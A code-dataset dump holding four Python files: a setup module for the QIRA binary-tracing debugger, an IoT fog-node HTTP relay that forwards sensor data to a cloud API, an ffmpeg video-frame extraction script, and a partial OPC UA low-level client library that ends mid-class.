source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
qira_program.py | from __future__ import print_function
from qira_base import *
import qira_config
import qira_analysis
import os
import shutil
import sys
import subprocess
import threading
import time
import collections
from hashlib import sha1
from subprocess import (Popen, PIPE)
import json
import struct
import qiradb
import arch
# new home of static2
sys.path.append(qira_config.BASEDIR+"/static2")
import static2
def which(prog):
try:
cmd = ["which", prog]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
res = p.stdout.readlines()
if len(res) == 0:
raise Exception("binary not found")
return os.path.realpath(res[0].strip())
except:
# fallback mode, look for the binary straight up
if os.path.isfile(prog):
return os.path.realpath(prog)
else:
raise Exception("binary not found")
# things that don't cross the fork
class Program:
def __init__(self, prog, args=[], qemu_args=[]):
# create the logs dir
try:
os.mkdir(qira_config.TRACE_FILE_BASE)
except:
pass
# call which to match the behavior of strace and gdb
self.program = which(prog)
self.args = args
self.proghash = sha1(open(self.program, "rb").read()).hexdigest()
print("*** program is",self.program,"with hash",self.proghash)
# this is always initted, as it's the tag repo
self.static = static2.Static(self.program)
# init static
if qira_config.WITH_STATIC:
threading.Thread(target=self.static.process).start()
# no traces yet
self.traces = {}
self.runnable = False
# bring this back
if self.program != "/tmp/qira_binary":
try:
os.unlink("/tmp/qira_binary")
except:
pass
try:
os.symlink(os.path.realpath(self.program), "/tmp/qira_binary")
except:
pass
# defaultargs for qira binary
self.defaultargs = ["-strace", "-D", "/dev/null", "-d", "in_asm", "-singlestep"]+qemu_args
if qira_config.TRACE_LIBRARIES:
self.defaultargs.append("-tracelibraries")
self.identify_program()
def identify_program(self):
qemu_dir = os.path.dirname(os.path.realpath(__file__))+"/../tracers/qemu/"
pin_dir = os.path.dirname(os.path.realpath(__file__))+"/../tracers/pin/"
lib_dir = os.path.dirname(os.path.realpath(__file__))+"/../libs/"
self.pinbinary = pin_dir+"pin-latest/pin"
# pmaps is global, but updated by the traces
progdat = open(self.program, "rb").read(0x800)
CPU_TYPE_ARM = b"\x0C"
CPU_TYPE_ARM64 = b"\x01\x00\x00\x0C"
CPU_SUBTYPE_ARM_ALL = b"\x00"
CPU_SUBTYPE_ARM_V4T = b"\x05"
CPU_SUBTYPE_ARM_V6 = b"\x06"
CPU_SUBTYPE_ARM_V5TEJ = b"\x07"
CPU_SUBTYPE_ARM_XSCALE = b"\x08"
CPU_SUBTYPE_ARM_V7 = b"\x09"
CPU_SUBTYPE_ARM_V7F = b"\x0A"
CPU_SUBTYPE_ARM_V7S = b"\x0B"
CPU_SUBTYPE_ARM_V7K = b"\x0C"
CPU_SUBTYPE_ARM_V6M = b"\x0E"
CPU_SUBTYPE_ARM_V7M = b"\x0F"
CPU_SUBTYPE_ARM_V7EM = b"\x10"
CPU_SUBTYPE_ARM = [
CPU_SUBTYPE_ARM_V4T,
CPU_SUBTYPE_ARM_V6,
CPU_SUBTYPE_ARM_V5TEJ,
CPU_SUBTYPE_ARM_XSCALE,
CPU_SUBTYPE_ARM_V7,
CPU_SUBTYPE_ARM_V7F,
CPU_SUBTYPE_ARM_V7K,
CPU_SUBTYPE_ARM_V6M,
CPU_SUBTYPE_ARM_V7M,
CPU_SUBTYPE_ARM_V7EM
]
CPU_SUBTYPE_ARM64 = [
CPU_SUBTYPE_ARM_ALL,
CPU_SUBTYPE_ARM_V7S
]
MACHO_MAGIC = b"\xFE\xED\xFA\xCE"
MACHO_CIGAM = b"\xCE\xFA\xED\xFE"
MACHO_MAGIC_64 = b"\xFE\xED\xFA\xCF"
MACHO_CIGAM_64 = b"\xCF\xFA\xED\xFE"
MACHO_FAT_MAGIC = b"\xCA\xFE\xBA\xBE"
MACHO_FAT_CIGAM = b"\xBE\xBA\xFE\xCA"
MACHO_P200_FAT_MAGIC = b"\xCA\xFE\xD0\x0D"
MACHO_P200_FAT_CIGAM = b"\x0D\xD0\xFE\xCA"
# Linux binaries
if progdat[0:4] == b"\x7FELF":
# get file type
self.fb = struct.unpack("H", progdat[0x12:0x14])[0] # e_machine
def use_lib(arch):
maybe_path = lib_dir+arch+"/"
if 'QEMU_LD_PREFIX' not in os.environ and os.path.exists(maybe_path):
os.environ['QEMU_LD_PREFIX'] = os.path.realpath(maybe_path)
print("**** set QEMU_LD_PREFIX to",os.environ['QEMU_LD_PREFIX'])
if self.fb == 0x28:
if '/lib/ld-linux.so.3' in progdat:
use_lib('armel')
elif '/lib/ld-linux-armhf.so.3' in progdat:
use_lib('armhf')
self.tregs = arch.ARMREGS
self.qirabinary = qemu_dir + "qira-arm"
elif self.fb == 0xb7:
use_lib('arm64')
self.tregs = arch.AARCH64REGS
self.qirabinary = qemu_dir + "qira-aarch64"
elif self.fb == 0x3e:
self.tregs = arch.X64REGS
self.qirabinary = qemu_dir + "qira-x86_64"
self.pintool = pin_dir + "obj-intel64/qirapin.so"
elif self.fb == 0x03:
use_lib('i386')
self.tregs = arch.X86REGS
self.qirabinary = qemu_dir + "qira-i386"
self.pintool = pin_dir + "obj-ia32/qirapin.so"
elif self.fb == 0x800:
use_lib('mips')
arch.MIPSREGS[2:-1] = (True, "mips")
self.tregs = arch.MIPSREGS
self.qirabinary = qemu_dir + 'qira-mips'
elif self.fb == 0x08:
use_lib('mipsel')
arch.MIPSREGS[2:-1] = (False, "mipsel")
self.tregs = arch.MIPSREGS
self.qirabinary = qemu_dir + 'qira-mipsel'
elif self.fb == 0x1400: # big endian...
use_lib('powerpc')
self.tregs = arch.PPCREGS
self.qirabinary = qemu_dir + "qira-ppc"
else:
raise Exception("binary type "+hex(self.fb)+" not supported")
self.qirabinary = os.path.realpath(self.qirabinary)
print("**** using",self.qirabinary,"for",hex(self.fb))
self.runnable = True
# Windows binaries
elif progdat[0:2] == b"MZ":
print("**** windows binary detected, only running the server")
pe = struct.unpack("I", progdat[0x3c:0x40])[0]
wh = struct.unpack("H", progdat[pe+4:pe+6])[0]
if wh == 0x14c:
print("*** 32-bit windows")
self.tregs = arch.X86REGS
self.fb = 0x03
elif wh == 0x8664:
print("*** 64-bit windows")
self.tregs = arch.X64REGS
self.fb = 0x3e
else:
raise Exception("windows binary with machine "+hex(wh)+" not supported")
# MACHO FAT binaries
elif progdat[0x0:0x04] in (MACHO_FAT_MAGIC, MACHO_FAT_CIGAM, MACHO_P200_FAT_MAGIC, MACHO_P200_FAT_CIGAM):
print("**** Mach-O FAT (Universal) binary detected")
if progdat[0x04:0x05] == CPU_TYPE_ARM and progdat[0x08:0x09] in CPU_SUBTYPE_ARM:
print("**** Mach-O ARM architecture detected")
self.macharch = "arm"
elif (progdat[0x08:0x0c] == CPU_TYPE_ARM64) or (progdat[0x1c:0x20] == CPU_TYPE_ARM64) or (progdat[0x30:0x34] == CPU_TYPE_ARM64):
print("**** Mach-O Aarch64 architecture detected")
self.macharch = "aarch64"
else:
self.macharch = ""
print("**** Mach-O X86/64 architecture detected")
if progdat[0x0:0x04] in (MACHO_P200_FAT_MAGIC, MACHO_P200_FAT_CIGAM):
raise NotImplementedError("Pack200 compressed files are not supported yet")
elif progdat[0x0:0x04] in (MACHO_FAT_MAGIC, MACHO_FAT_CIGAM):
if progdat[0x0:0x04] == MACHO_FAT_CIGAM:
arch.ARMREGS[2] = True
arch.AARCH64REGS[2] = True
if self.macharch == "arm":
self.tregs = arch.ARMREGS
self.pintool = ""
elif self.macharch == "aarch64":
self.tregs = arch.AARCH64REGS
self.pintool = ""
else:
self.tregs = arch.X86REGS
self.pintool = pin_dir + "obj-ia32/qirapin.dylib"
else:
raise Exception("Mach-O FAT (Universal) binary not supported")
if self.macharch == "arm" or self.macharch == "aarch64":
raise NotImplementedError("ARM/Aarch64 Support is not implemented")
if not os.path.isfile(self.pintool):
print("Running a Mach-O FAT (Universal) binary requires PIN support. See tracers/pin_build.sh")
exit()
raise NotImplementedError("Mach-O FAT (Universal) binary not supported")
self.runnable = True
# MACHO binaries
elif progdat[0x0:0x04] in (MACHO_MAGIC_64, MACHO_CIGAM_64, MACHO_MAGIC, MACHO_CIGAM):
print("**** Mach-O binary detected")
if progdat[0x04:0x05] == CPU_TYPE_ARM and progdat[0x08:0x09] in CPU_SUBTYPE_ARM:
print("**** Mach-O ARM architecture detected")
self.macharch = "arm"
elif progdat[0x04:0x05] == CPU_TYPE_ARM and progdat[0x08:0x09] in CPU_SUBTYPE_ARM64:
print("**** Mach-O Aarch64 architecture detected")
self.macharch = "aarch64"
else:
self.macharch = ""
print("**** Mach-O X86/64 architecture detected")
if progdat[0x0:0x04] in (MACHO_MAGIC_64, MACHO_CIGAM_64):
if progdat[0x0:0x04] == MACHO_CIGAM_64:
arch.AARCH64REGS[2] = True
if self.macharch == "aarch64":
self.tregs = arch.AARCH64REGS
self.pintool = ""
else:
self.tregs = arch.X64REGS
self.pintool = pin_dir + "obj-intel64/qirapin.dylib"
elif progdat[0x0:0x04] in (MACHO_MAGIC, MACHO_CIGAM):
if progdat[0x0:0x04] == MACHO_CIGAM:
arch.ARMREGS[2] = True
if self.macharch == "arm":
self.tregs = arch.ARMREGS
self.pintool = ""
else:
self.tregs = arch.X86REGS
self.pintool = pin_dir + "obj-ia32/qirapin.dylib"
else:
raise Exception("Mach-O binary not supported")
if self.macharch == "arm" or self.macharch == "aarch64":
raise NotImplementedError("ARM/Aarch64 Support is not implemented")
if not os.path.isfile(self.pintool):
print("Running a Mach-O binary requires PIN support. See tracers/pin_build.sh")
exit()
self.runnable = True
else:
raise Exception("unknown binary type")
def clear(self):
# probably always good to do except in development of middleware
print("*** deleting old runs")
self.delete_old_runs()
# getting asm from qemu
self.create_asm_file()
def create_asm_file(self):
if os.name == "nt":
return
try:
os.unlink("/tmp/qira_asm")
except:
pass
open("/tmp/qira_asm", "a").close()
self.qira_asm_file = open("/tmp/qira_asm", "r")
def read_asm_file(self):
if os.name == "nt":
return
dat = self.qira_asm_file.read()
if len(dat) == 0:
return
cnt = 0
for d in dat.split("\n"):
thumb = False
if len(d) == 0:
continue
# hacks
try:
if self.fb == 0x28:
#thumb bit in front
addr = int(d.split(" ")[0][1:].strip(":"), 16)
else:
addr = int(d.split(" ")[0].strip(":"), 16)
except:
continue
if self.fb == 0x28:
thumb_flag = d[0]
if thumb_flag == 't':
thumb = True
# override the arch since it's thumb, clear invalid tag
del self.static[addr]['instruction']
self.static[addr]['arch'] = "thumb"
elif thumb_flag == 'n':
thumb = False
else:
#print "*** Invalid thumb flag at beginning of instruction"
pass
inst = d[d.rfind(" ")+2:]
elif self.fb == 0xb7: # aarch64
inst = d[d.rfind(" ")+5:]
else:
inst = d[d.find(":")+3:]
cnt += 1
# trigger disasm
d = self.static[addr]['instruction']
#print addr, inst
#sys.stdout.write("%d..." % cnt); sys.stdout.flush()
def delete_old_runs(self):
# delete the logs
shutil.rmtree(qira_config.TRACE_FILE_BASE)
os.mkdir(qira_config.TRACE_FILE_BASE)
def get_maxclnum(self):
ret = {}
for t in self.traces:
ret[t] = [self.traces[t].db.get_minclnum(), self.traces[t].db.get_maxclnum()]
return ret
def get_pmaps(self):
ret = {}
for t in self.traces:
pm = self.traces[t].db.get_pmaps()
for a in pm:
if a not in ret:
ret[a] = pm[a]
elif ret[a] == "memory":
ret[a] = pm[a]
# fix for numberless js
rret = {}
for k in ret:
rret[ghex(k)] = ret[k]
return rret
def add_trace(self, fn, i):
self.traces[i] = Trace(fn, i, self, self.tregs[1], len(self.tregs[0]), self.tregs[2])
return self.traces[i]
def execqira(self, args=[], shouldfork=True):
if self.runnable == False:
return
if qira_config.USE_PIN:
# is "-injection child" good?
eargs = [self.pinbinary, "-injection", "child", "-t", self.pintool, "--", self.program]+self.args
else:
eargs = [self.qirabinary]+self.defaultargs+args+[self.program]+self.args
if not os.path.exists(eargs[0]):
print("\nQIRA tracer %s not found" % eargs[0])
print("Your install is broken. Check ./install.sh for issues")
exit(-1)
if shouldfork:
if os.fork() != 0:
return
#print "***",' '.join(eargs)
os.execvp(eargs[0], eargs)
class Trace:
def __init__(self, fn, forknum, program, r1, r2, r3):
self.forknum = forknum
self.program = program
self.db = qiradb.PyTrace(fn, forknum, r1, r2, r3)
self.load_base_memory()
# analysis stuff
self.maxclnum = None
self.minclnum = None
self.flow = None
self.dmap = None
self.maxd = 0
self.analysisready = False
self.picture = None
self.needs_update = False
self.strace = []
self.mapped = []
self.keep_analysis_thread = True
threading.Thread(target=self.analysis_thread).start()
def fetch_raw_memory(self, clnum, address, ln):
return ''.join(map(chr, self.fetch_memory(clnum, address, ln).values()))
# proxy the db call and fill in base memory
def fetch_memory(self, clnum, address, ln):
mem = self.db.fetch_memory(clnum, address, ln)
dat = {}
for i in range(ln):
# we don't rebase the memory anymore, important for numberless
ri = address+i
if mem[i] & 0x100:
dat[i] = mem[i]&0xFF
else:
try:
if (sys.version_info > (3, 0)):
dat[i] = self.program.static.memory(ri, 1)[0]
else:
dat[i] = ord(self.program.static.memory(ri, 1)[0])
except IndexError:
pass
return dat
def read_strace_file(self):
try:
f = open(qira_config.TRACE_FILE_BASE+str(int(self.forknum))+"_strace").read()
except:
return "no strace"
f = ''.join(filter(lambda x: ord(x) < 0x80, f))
ret = []
files = {}
for ff in f.split("\n"):
if ff == '':
continue
ff = ff.split(" ")
try:
clnum = int(ff[0])
except:
continue
# i think this filter isn't so useful now
pid = int(ff[1])
sc = " ".join(ff[2:])
try:
return_code = int(sc.split(") = ")[1].split(" ")[0], 0)
fxn = sc.split("(")[0]
if (fxn == "open" or fxn == "openat") and return_code != -1:
firststr = sc.split('\"')[1]
files[return_code] = firststr
elif fxn[0:4] == "mmap":
args = sc.split(",")
sz = int(args[1], 0)
fil = int(args[4], 0)
off = int(args[5].split(")")[0], 0)
mapp = (files[fil], sz, off, return_code)
if mapp not in self.mapped:
# if it fails once, don't try again
self.mapped.append(mapp)
try:
try:
f = open(os.environ['QEMU_LD_PREFIX']+"/"+files[fil], 'rb')
except:
f = open(files[fil], 'rb')
alldat = f.read()
if fxn == "mmap2":
off = 4096*off # offset argument is in terms of pages for mmap2()
# is it safe to assume 4096 byte pages?
st = "*** mapping %s %s sz:0x%x off:0x%x @ 0x%X" % (sha1(alldat).hexdigest(), files[fil], sz, off, return_code)
print(st,)
dat = alldat[off:off+sz]
self.program.static.add_memory_chunk(return_code, dat)
except Exception as e:
print(e)
except:
pass
ret.append({"clnum": clnum, "pid":pid, "sc": sc})
self.strace = ret
def analysis_thread(self):
print("*** started analysis_thread", self.forknum)
while self.keep_analysis_thread:
time.sleep(0.2)
# so this is done poorly, analysis can be incremental
if self.maxclnum == None or self.db.get_maxclnum() != self.maxclnum:
self.analysisready = False
minclnum = self.db.get_minclnum()
maxclnum = self.db.get_maxclnum()
self.program.read_asm_file()
self.flow = qira_analysis.get_instruction_flow(self, self.program, minclnum, maxclnum)
self.dmap = qira_analysis.get_hacked_depth_map(self.flow, self.program)
qira_analysis.analyse_calls(self)
# hacky pin offset problem fix
hpo = len(self.dmap)-(maxclnum-minclnum)
if hpo == 2:
self.dmap = self.dmap[1:]
self.maxd = max(self.dmap)
self.picture = qira_analysis.get_vtimeline_picture(self, minclnum, maxclnum)
self.minclnum = minclnum
self.maxclnum = maxclnum
self.needs_update = True
#print "analysis is ready"
print("*** ended analysis_thread", self.forknum)
def load_base_memory(self):
def get_forkbase_from_log(n):
ret = struct.unpack("i", open(qira_config.TRACE_FILE_BASE+str(n), 'rb').read(0x18)[0x10:0x14])[0]
if ret == -1:
return n
else:
return get_forkbase_from_log(ret)
try:
forkbase = get_forkbase_from_log(self.forknum)
print("*** using base %d for %d" % (forkbase, self.forknum))
f = open(qira_config.TRACE_FILE_BASE+str(forkbase)+"_base", 'r')
except Exception as e:
print("*** base file issue",e)
# done
return
# Use any bundled images first. The structure of the images directory is:
# _images/
# urlencoded%20image.dll
# or%20maybe%20a%20folder.dll/
# 0000C000
# 100008000
# where a folder is like a sparsefile with chunks of data at it's hex-offset-named
# subfiles. The reason for this sparsefile stuff is that OS X has non-contigous
# loaded images, so we compensate by having each "file" actually be a chunk of
# address space, which in theory could be very large. (The correct solution of
# storing just the image file along with the regions data isn't well exposed
# by Pin at this time, and would require explicit mach-o parsing and stuff.)
img_map = {}
images_dir = qira_config.TRACE_FILE_BASE+str(self.forknum)+"_images"
if os.path.isdir(images_dir):
try:
from urllib import unquote
for image in os.listdir(images_dir):
if os.path.isfile(images_dir+"/"+image):
img_map[unquote(image)] = {0: images_dir+"/"+image}
else: # It's a directory
off_map = {}
for offset in os.listdir(images_dir+"/"+image):
off_map[int(offset, 16)] = images_dir+"/"+image+"/"+offset
img_map[unquote(image)] = off_map
except Exception as e:
print("Exception while dealing with _images/:", e)
for ln in f.read().split("\n"):
ln = ln.split(" ")
if len(ln) < 3:
continue
(ss, se) = ln[0].split("-")
ss = int(ss, 16)
se = int(se, 16)
offset = int(ln[1], 16)
fn = ' '.join(ln[2:])
try:
if fn in img_map:
off = max(i for i in img_map[fn].iter_keys() if i <= offset)
with open(img_map[fn][off], 'rb') as f:
f.seek(offset-off)
dat = f.read(se-ss)
else:
with open(fn, 'rb') as f:
f.seek(offset)
dat = f.read(se-ss)
except Exception as e:
print("Failed to get", fn, "offset", offset, ":", e)
continue
self.program.static.add_memory_chunk(ss, dat)
|
fog_agent_new_tests.py | #Author: Roberto Goncalves Pacheco
#Universidade do Estado do Rio de Janeiro
#Departamento de Eletronica e Telecomunicacoes
#Project: Sensing Bus
#Subject: Comunication between Cloud and Fog
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import SocketServer
from signal import signal, SIGPIPE, SIG_DFL
from urlparse import parse_qs
import json
import requests
import time
import datetime
import threading, Queue
import sys
import Module
signal(SIGPIPE, SIG_DFL)
SERVER_CERTS = '/home/pi/ssl/ca-chain.cert.pem' #To verify server
STOP_ID = 1 #This raspberrie's id
MEASUREMENTS_URL = 'https://sensingbus.gta.ufrj.br/measurements_batch_sec/' #Endpoint of insertion api
# Variables for server-side validation:
PRIMARY_KEY='/home/pi/ssl/raspberry.key.pem'
LOCAL_CERTIFICATE='/home/pi/ssl/raspberry.cert.pem'
q = Queue.Queue()
def send_thread(thread_name,q):
"""Sends periodically stored data"""
while True:
output = {}
output['stop_id'] = STOP_ID
output['batches'] = []
if not q.empty():
while not q.empty():
b = q.get()
if ( b is not None):
output['batches'].append(b)
cloud_client(output)
time.sleep(30)
def cloud_client(payload):
""" Sends mensage to Cloud"""
r = requests.post(MEASUREMENTS_URL,
json=payload,
verify=SERVER_CERTS,
cert=(LOCAL_CERTIFICATE, PRIMARY_KEY))
print r
class S(BaseHTTPRequestHandler):
def _set_headers(self):
"""Creates header HTTP requisition"""
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def do_POST(self):
"""Receives data from Arduino and sends to Cloud"""
input_batches = {}
postvars = parse_qs(self.rfile.read(int(self.headers['Content-Length'])),
keep_blank_values=1)
print postvars
input_batches['node_id'] = postvars['node_id'][0]
for line in postvars['load']:
tmp = line.split('\n')
module = Module.module(tmp)
module.controller()
#cloud_client(module.get_payload())
#input_batches['type'] = str(postvars['type'][0])
#input_batches['header'] = str(postvars['header'][0])
#input_batches['received'] = str(datetime.datetime.now())
#input_batches['load'] = tmp[0:-1] #the last line is always empty
#q.put(input_batches)
return
def run(server_class=HTTPServer, handler_class=S, port=50000):
"""Generates a server to receive POST method"""
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print 'Starting Server Http'
t = threading.Thread( target = send_thread, args=('alt',q))
t.daemon = True
t.start()
httpd.serve_forever()
t.join()
if __name__ == "__main__":
run()
|
vid2img_other.py | # Code for "TSM: Temporal Shift Module for Efficient Video Understanding"
# arXiv:1811.08383
# Ji Lin*, Chuang Gan, Song Han
# {jilin, songhan}@mit.edu, ganchuang@csail.mit.edu
import os
import threading
import pdb
NUM_THREADS = 12
# VIDEO_ROOT = '/ssd/video/something/v2/20bn-something-something-v2' # Downloaded webm videos
# FRAME_ROOT = '/ssd/video/something/v2/20bn-something-something-v2-frames' # Directory for extracted frames
# VIDEO_ROOT = '/data/datasets/smt-smt-V2/20bn-something-something-v2'
# FRAME_ROOT = '/data/datasets/smt-smt-V2/20bn-something-something-v2-frames'
num_sec = 5
VIDEO_ROOT = '/data/datasets/in_the_wild/gifs'
FRAME_ROOT = f'/data/datasets/in_the_wild/gifs-frames-{num_sec}s'
# VIDEO_ROOT = '/data/datasets/in_the_wild/dataset_imar'
# FRAME_ROOT = f'/data/datasets/in_the_wild/dataset_imar-frames-{num_sec}s'
def split(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def extract(video, tmpl='%06d.jpg'):
# os.system(f'ffmpeg -i {VIDEO_ROOT}/{video} -vf -threads 1 -vf scale=-1:256 -q:v 0 '
# f'{FRAME_ROOT}/{video[:-5]}/{tmpl}')
# cmd0 = 'ffmpeg -i \"{}/{}\" -threads 1 -vf scale=-1:256 -q:v 0 \"{}/{}/%06d.jpg\"'.format(VIDEO_ROOT, video,
# FRAME_ROOT, video[:-5])
cmd = f'ffmpeg -t 00:0{num_sec} '
cmd = cmd + '-i \"{}/{}\" -threads 1 -vf scale=-1:256 -q:v 0 \"{}/{}/%06d.jpg\"'.format(VIDEO_ROOT, video,
FRAME_ROOT, video[:-5])
os.system(cmd)
def target(video_list):
for video in video_list:
video_path = os.path.join(FRAME_ROOT, video[:-5])
if not os.path.exists(video_path):
#print(f'video {video_path} does not exists')
os.makedirs(os.path.join(FRAME_ROOT, video[:-5]))
extract(video)
else:
dir_files = os.listdir(os.path.join(FRAME_ROOT, video[:-5]))
if len(dir_files) <= 10:
print(f'folder {video} has only {len(dir_files)} frames')
extract(video)
if __name__ == '__main__':
if not os.path.exists(VIDEO_ROOT):
raise ValueError('Please download videos and set VIDEO_ROOT variable.')
if not os.path.exists(FRAME_ROOT):
os.makedirs(FRAME_ROOT)
video_list = os.listdir(VIDEO_ROOT)
splits = list(split(video_list, NUM_THREADS))
threads = []
for i, split in enumerate(splits):
#target(split)
thread = threading.Thread(target=target, args=(split,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join() |
ua_client.py | """
Low level binary client
"""
import logging
import socket
from threading import Thread, Lock
from concurrent.futures import Future
from functools import partial
from opcua import ua
from opcua.ua.ua_binary import struct_from_binary, uatcp_to_binary, struct_to_binary, nodeid_from_binary
from opcua.ua.uaerrors import UaError, BadTimeout, BadNoSubscription, BadSessionClosed
from opcua.common.connection import SecureConnection
class UASocketClient(object):
"""
handle socket connection and send ua messages
timeout is the timeout used while waiting for an ua answer from server
"""
def __init__(self, timeout=1, security_policy=ua.SecurityPolicy()):
self.logger = logging.getLogger(__name__ + ".Socket")
self._thread = None
self._lock = Lock()
self.timeout = timeout
self._socket = None
self._do_stop = False
self.authentication_token = ua.NodeId()
self._request_id = 0
self._request_handle = 0
self._callbackmap = {}
self._connection = SecureConnection(security_policy)
def start(self):
"""
Start receiving thread.
this is called automatically in connect and
should not be necessary to call directly
"""
self._thread = Thread(target=self._run)
self._thread.start()
def _send_request(self, request, callback=None, timeout=1000, message_type=ua.MessageType.SecureMessage):
"""
send request to server, lower-level method
timeout is the timeout written in ua header
returns future
"""
with self._lock:
request.RequestHeader = self._create_request_header(timeout)
self.logger.debug("Sending: %s", request)
try:
binreq = struct_to_binary(request)
except Exception:
# reset reqeust handle if any error
# see self._create_request_header
self._request_handle -= 1
raise
self._request_id += 1
future = Future()
if callback:
future.add_done_callback(callback)
self._callbackmap[self._request_id] = future
msg = self._connection.message_to_binary(binreq, message_type=message_type, request_id=self._request_id)
self._socket.write(msg)
return future
def send_request(self, request, callback=None, timeout=1000, message_type=ua.MessageType.SecureMessage):
"""
send request to server.
timeout is the timeout written in ua header
returns response object if no callback is provided
"""
future = self._send_request(request, callback, timeout, message_type)
if not callback:
data = future.result(self.timeout)
self.check_answer(data, " in response to " + request.__class__.__name__)
return data
def check_answer(self, data, context):
data = data.copy()
typeid = nodeid_from_binary(data)
if typeid == ua.FourByteNodeId(ua.ObjectIds.ServiceFault_Encoding_DefaultBinary):
self.logger.warning("ServiceFault from server received %s", context)
hdr = struct_from_binary(ua.ResponseHeader, data)
hdr.ServiceResult.check()
return False
return True
def _run(self):
self.logger.info("Thread started")
while not self._do_stop:
try:
self._receive()
except ua.utils.SocketClosedException:
self.logger.info("Socket has closed connection")
break
except UaError:
self.logger.exception("Protocol Error")
self.logger.info("Thread ended")
def _receive(self):
msg = self._connection.receive_from_socket(self._socket)
if msg is None:
return
elif isinstance(msg, ua.Message):
self._call_callback(msg.request_id(), msg.body())
elif isinstance(msg, ua.Acknowledge):
self._call_callback(0, msg)
elif isinstance(msg, ua.ErrorMessage):
self.logger.warning("Received an error: %s", msg)
else:
raise ua.UaError("Unsupported message type: %s", msg)
def _call_callback(self, request_id, body):
with self._lock:
future = self._callbackmap.pop(request_id, None)
if future is None:
raise ua.UaError(
"No future object found for request: {0}, callbacks in list are {1}"
.format(request_id, self._callbackmap.keys())
)
future.set_result(body)
def _create_request_header(self, timeout=1000):
hdr = ua.RequestHeader()
hdr.AuthenticationToken = self.authentication_token
self._request_handle += 1
hdr.RequestHandle = self._request_handle
hdr.TimeoutHint = timeout
return hdr
def connect_socket(self, host, port):
"""
connect to server socket and start receiving thread
"""
self.logger.info("opening connection")
sock = socket.create_connection((host, port))
# nodelay necessary to avoid packing in one frame, some servers do not like it
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self._socket = ua.utils.SocketWrapper(sock)
self.start()
def disconnect_socket(self):
self.logger.info("Request to close socket received")
self._do_stop = True
try:
self._socket.socket.shutdown(socket.SHUT_RDWR)
except (socket.error, OSError) as exc:
if exc.errno in (errno.ENOTCONN, errno.EBADF):
pass # Socket is not connected, so can't send FIN packet.
else:
raise
self._socket.socket.close()
self.logger.info("Socket closed, waiting for receiver thread to terminate...")
if self._thread and self._thread.is_alive():
self._thread.join()
self._callbackmap.clear()
self.logger.info("Done closing socket: Receiving thread terminated, socket disconnected")
def send_hello(self, url, max_messagesize=0, max_chunkcount=0):
hello = ua.Hello()
hello.EndpointUrl = url
hello.MaxMessageSize = max_messagesize
hello.MaxChunkCount = max_chunkcount
future = Future()
with self._lock:
self._callbackmap[0] = future
binmsg = uatcp_to_binary(ua.MessageType.Hello, hello)
self._socket.write(binmsg)
ack = future.result(self.timeout)
return ack
def open_secure_channel(self, params):
self.logger.info("open_secure_channel")
request = ua.OpenSecureChannelRequest()
request.Parameters = params
future = self._send_request(request, message_type=ua.MessageType.SecureOpen)
# FIXME: we have a race condition here
# we can get a packet with the new token id before we reach to store it..
response = struct_from_binary(ua.OpenSecureChannelResponse, future.result(self.timeout))
response.ResponseHeader.ServiceResult.check()
self._connection.set_channel(response.Parameters)
return response.Parameters
def close_secure_channel(self):
"""
close secure channel. It seems to trigger a shutdown of socket in most servers, so be prepare to reconnect.
OPC UA specs Part 6, 7.1.4 say that Server does not send a CloseSecureChannel response and should just close
socket
"""
self.logger.info("close_secure_channel")
request = ua.CloseSecureChannelRequest()
try:
future = self._send_request(request, message_type=ua.MessageType.SecureClose)
with self._lock:
# some servers send a response here, most do not ... so we ignore
future.cancel()
except (socket.error, OSError) as exc:
if exc.errno in (errno.ENOTCONN, errno.EBADF):
# Socket is closed, so can't send CloseSecureChannelRequest.
self.logger.warning("close_secure_channel() failed: socket already closed")
else:
raise
def is_secure_channel_open(self):
return self._connection.is_open()
class UaClient(object):
"""
low level OPC-UA client.
It implements (almost) all methods defined in opcua spec
taking in argument the structures defined in opcua spec.
In this Python implementation most of the structures are defined in
uaprotocol_auto.py and uaprotocol_hand.py available under opcua.ua
"""
def __init__(self, timeout=1):
self.logger = logging.getLogger(__name__)
# _publishcallbacks should be accessed in recv thread only
self._publishcallbacks = {}
self._timeout = timeout
self._uasocket = None
self.security_policy = ua.SecurityPolicy()
def set_security(self, policy):
self.security_policy = policy
def connect_socket(self, host, port):
"""
connect to server socket and start receiving thread
"""
self._uasocket = UASocketClient(self._timeout, security_policy=self.security_policy)
return self._uasocket.connect_socket(host, port)
def disconnect_socket(self):
return self._uasocket.disconnect_socket()
def send_hello(self, url, max_messagesize=0, max_chunkcount=0):
return self._uasocket.send_hello(url, max_messagesize, max_chunkcount)
def open_secure_channel(self, params):
return self._uasocket.open_secure_channel(params)
def close_secure_channel(self):
"""
close secure channel. It seems to trigger a shutdown of socket
in most servers, so be prepare to reconnect
"""
return self._uasocket.close_secure_channel()
def create_session(self, parameters):
self.logger.info("create_session")
request = ua.CreateSessionRequest()
request.Parameters = parameters
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.CreateSessionResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
self._uasocket.authentication_token = response.Parameters.AuthenticationToken
return response.Parameters
def activate_session(self, parameters):
self.logger.info("activate_session")
request = ua.ActivateSessionRequest()
request.Parameters = parameters
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.ActivateSessionResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Parameters
def close_session(self, deletesubscriptions):
self.logger.info("close_session")
# Bail out if we don't have an open server-channel to unsubscribe ourself.
if not self._uasocket.is_secure_channel_open():
return
request = ua.CloseSessionRequest()
request.DeleteSubscriptions = deletesubscriptions
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.CloseSessionResponse, data)
try:
response.ResponseHeader.ServiceResult.check()
except BadSessionClosed:
# Problem: closing the session with open publish requests leads to BadSessionClosed responses
# we can just ignore it therefore.
# Alternatively we could make sure that there are no publish requests in flight when
# closing the session.
pass
def browse(self, parameters):
self.logger.info("browse")
request = ua.BrowseRequest()
request.Parameters = parameters
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.BrowseResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
